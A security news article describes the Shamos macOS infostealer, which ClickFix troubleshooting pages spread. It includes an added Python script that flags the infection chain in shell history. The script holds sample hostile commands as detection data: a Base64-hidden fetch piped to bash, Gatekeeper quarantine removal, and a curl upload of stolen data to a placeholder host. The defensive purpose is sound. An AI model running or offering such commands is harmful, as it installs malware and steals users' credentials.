Shamos Malware Targets Macs Via ClickFix Attacks

A new infostealer malware, dubbed ‘Shamos,’ is actively targeting Mac devices through deceptive ClickFix attacks. These attacks masquerade as legitimate troubleshooting guides and purported system fixes, deceiving users into unknowingly installing the malicious software.

Shamos, identified as a variant of the Atomic macOS Stealer (AMOS), was reportedly developed by the cybercriminal group known as “COOKIE SPIDER.” The primary function of Shamos is to pilfer sensitive data and credentials stored within various applications and services on the compromised Mac device. This includes information from web browsers, Keychain access, Apple Notes, and cryptocurrency wallets.

CrowdStrike, a cybersecurity firm, detected the Shamos malware and reported that infection attempts have been identified in over 300 environments globally under their monitoring since June 2025. This indicates a widespread and ongoing campaign targeting Mac users.

The malware is propagated through ClickFix attacks, which are delivered via malvertising or through deceptive GitHub repositories. These attacks manipulate users into executing specific shell commands within the macOS Terminal application. Victims are often presented with prompts urging them to run these commands under the guise of installing software or resolving fabricated errors. However, the execution of these commands initiates the download and installation of the Shamos malware onto the system.

Advertisements and spoofed web pages, such as mac-safer[.]com and rescue-mac[.]com, are used to lure potential victims. These pages often claim to provide assistance with common macOS problems that users are likely to search for online. The pages contain instructions that direct users to copy and paste commands into the Terminal to supposedly fix the identified issue. Unbeknownst to the user, these commands do not fix any problems but instead initiate the malware infection process.

The malicious command, when executed, decodes a Base64-encoded URL and retrieves a malicious Bash script from a remote server. This script captures the user’s password and downloads the Shamos Mach-O executable. The script then prepares and executes the malware, using ‘xattr’ to remove the quarantine flag and ‘chmod’ to make the binary executable, effectively bypassing Apple’s Gatekeeper security feature.

Once Shamos is executed on a device, it runs anti-VM checks to determine whether it is running within a sandboxed environment. Following this, AppleScript commands are executed for host reconnaissance and data collection. Shamos then searches for specified types of sensitive data stored on the device, including cryptocurrency wallet files, Keychain data, Apple Notes data, and information stored within the victim’s web browsers.

After the data collection process is completed, Shamos packages the collected information into an archive file named ‘out.zip’ and transmits this archive to the attacker using the ‘curl’ command. In instances where the malware is executed with sudo (superuser) privileges, Shamos creates a Plist file named ‘com.finder.helper.plist’ and stores it in the user’s LaunchDaemons directory. This ensures persistence through automatic execution when the system starts up.
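The infection chain and persistence steps described above translate directly into detection logic. The following Python script is an added example written for this page; it is not code from the article, from CrowdStrike, or from the malware. It applies the indicators the article names (a Base64-decoded URL piped to a fetch-and-run, ‘xattr’ removal of the quarantine attribute, ‘chmod +x’, a ‘curl’ upload of ‘out.zip’, and a ‘com.finder.helper.plist’ under LaunchDaemons) to shell-history style command lines. The sample commands, the URL hidden inside the Base64 blob, and the rule names are all constructed placeholders for this example.

```python
"""Flag ClickFix-style macOS install chains in a list of shell command lines.

Added example for this page; the rules mirror the chain the article
describes (Base64 URL stager, xattr quarantine removal, chmod +x, curl
upload of out.zip, LaunchDaemons plist). Sample data is constructed.
"""
import base64
import binascii
import re

# Rule name -> compiled pattern. The names are this example's own labels.
RULES = [
    ("stager_base64_to_shell",
     re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:curl|xargs|bash|sh|zsh)\b")),
    ("quarantine_removal",
     re.compile(r"xattr\s+-r?d\s+com\.apple\.quarantine\b")),
    ("chmod_executable",
     re.compile(r"chmod\s+[ugoa]*\+x\b")),
    ("curl_upload_out_zip",
     re.compile(r"curl\b.*\bout\.zip\b")),
    ("launchdaemon_plist",
     re.compile(r"LaunchDaemons/com\.finder\.helper\.plist\b")),
]

# Candidate Base64 tokens: long runs of alphabet characters plus optional padding.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Constructed sample data: a placeholder URL encoded the way a ClickFix
# one-liner hides its stager address, followed by the rest of the chain.
PLACEHOLDER_URL = "https://example.invalid/stage.sh"  # constructed, not a real host
ENCODED = base64.b64encode(PLACEHOLDER_URL.encode()).decode()
SAMPLE_COMMANDS = [
    f'echo "{ENCODED}" | base64 -d | xargs curl -fsSL | bash',
    "xattr -d com.apple.quarantine ~/Downloads/update",
    "chmod +x ~/Downloads/update",
    'curl -X POST -F "file=@/tmp/out.zip" https://example.invalid/upload',
    "cp ~/helper.plist /Library/LaunchDaemons/com.finder.helper.plist",
    "ls -la ~/Documents",          # benign noise
    "brew install wget",           # benign noise
]


def decoded_urls(command):
    """Return URLs recovered from Base64 tokens in the command (empty if none)."""
    found = []
    for token in _B64_TOKEN.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text: e.g. a path like Library/LaunchDaemons/com
        if text.isprintable() and text.startswith(("http://", "https://")):
            found.append(text)
    return found


def analyze(command):
    """Return the names of the rules a single command line triggers, in RULES order."""
    return [name for name, pattern in RULES if pattern.search(command)]


def scan(commands):
    """Scan command lines and return (hits, verdict).

    hits maps rule name -> list of indexes of the matching commands. The
    verdict is 'likely_clickfix_chain' when the Base64 stager is seen
    together with quarantine removal or chmod +x, 'suspicious' for any
    other hit, and 'clean' when nothing matched.
    """
    hits = {}
    for idx, cmd in enumerate(commands):
        for name in analyze(cmd):
            hits.setdefault(name, []).append(idx)
    stages = set(hits)
    if "stager_base64_to_shell" in stages and stages & {"quarantine_removal", "chmod_executable"}:
        verdict = "likely_clickfix_chain"
    elif stages:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return hits, verdict


if __name__ == "__main__":
    hits, verdict = scan(SAMPLE_COMMANDS)
    print("verdict:", verdict)
    for name, idxs in hits.items():
        print(f"  {name}: lines {idxs}")
    for cmd in SAMPLE_COMMANDS:
        for url in decoded_urls(cmd):
            print("  decoded stager URL:", url)
```

The chain verdict deliberately requires the stager plus a Gatekeeper-bypass step, because ‘chmod +x’ or a quarantine removal on its own is routine developer activity; a single hit is only reported as suspicious. The decoder in `decoded_urls` is what surfaces the hidden download address for triage, since the literal URL never appears in the pasted command.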

CrowdStrike’s analysis also revealed that Shamos possesses the capability to download additional payloads onto the victim’s home directory. Instances have been observed where threat actors have deployed a spoofed Ledger Live wallet application and a botnet module.

macOS users are cautioned against executing commands found online if the purpose and functionality of the commands are not fully understood. The same caution applies to GitHub repositories, as the platform is often exploited to host malicious projects designed to infect unsuspecting users. When encountering issues with macOS, it is recommended to avoid sponsored search results and instead seek assistance through official Apple Community forums, which are moderated by Apple, or by using the system’s built-in Help function (Cmd + Space → “Help”).

ClickFix attacks have become an increasingly common tactic used for malware distribution. Threat actors employ these attacks in various scenarios, including TikTok videos, disguised captchas, and as purported fixes for fake Google Meet errors. The effectiveness of this tactic has led to its adoption in ransomware attacks and by state-sponsored threat actors.
